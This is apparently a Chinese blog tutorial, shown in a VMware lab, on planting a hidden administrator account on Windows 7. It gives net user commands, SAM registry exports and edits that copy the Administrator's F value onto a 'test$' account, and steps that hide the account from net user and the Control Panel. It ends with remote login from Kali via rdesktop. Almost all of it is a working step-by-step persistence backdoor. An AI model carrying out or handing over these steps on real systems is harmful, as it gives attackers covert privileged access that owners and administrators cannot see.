本文章使用windows7旗舰版系统,kali Linux系统,在VMware下进行啊演示。
1.对注册表授权
win+r //运行
regedit.exe //进入注册表
HKEY_LOCAL_MACHINE/SAM/SAM
修改SAM文件夹权限(右击SAM-权限 设置Administrators用户允许完全控制)
2.新建特殊帐户
以管理员权限运行dos
net user test$ 123123 /add //添加用户test$ 密码设为123123
net localgroup administrators test$ /add //提升权限
net user //验证无法发现test帐户
但是在 控制面板\用户帐户和家庭安全\用户帐户\管理帐户 下可以找到test帐户
3.导出注册表
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/test$ 获取默认类型为0X3ed
将注册表HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/test$导出为1.reg
将注册表HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003EB(3EB:test$的键值)导出为2.reg
默认情况下,管理员帐户administrator对应的注册表键值为
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4(administrator类型为1F4) 导出为3.reg
将2.reg中的键F的值替换成3.reg中键F中的值(记事本打开替换)
(这里的1,2是test$的注册表。 3是administrator的权限内容。所以需要复制3中的F键,注意下面图片标红的内容)
4.命令行删除特殊帐户
net user test$ /del //删除
5.导入reg文件
win+r打开运行
regedit /s 1.reg (计算机原因,命令不好用,直接在图形用户界面将注册表双击打开写入)
regedit /s 2.reg
(注意注册表键值要对应Names/test$中的键值与Uaers文件名的值要对应)
进入dos验证net user test$//可以查看
控制面板//不可见 命令net user//不可见
/*隐藏账户已经创建完毕*/
但是:
通过命令查看test$用户时发现“账户启用 NO”,所以下一步要启用这个账户:
右击我的电脑--管理--本地用户和组--用户--test$ 取消账户已禁用
//记得开放这台计算机的允许远程协助
启动kali
#rdesktop -f -a 16 IP:端口 //启动远程协助(端口基本为3389)
使用"其他用户" 输入隐藏账户的账户和密码,获取主机控制权:
2647
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
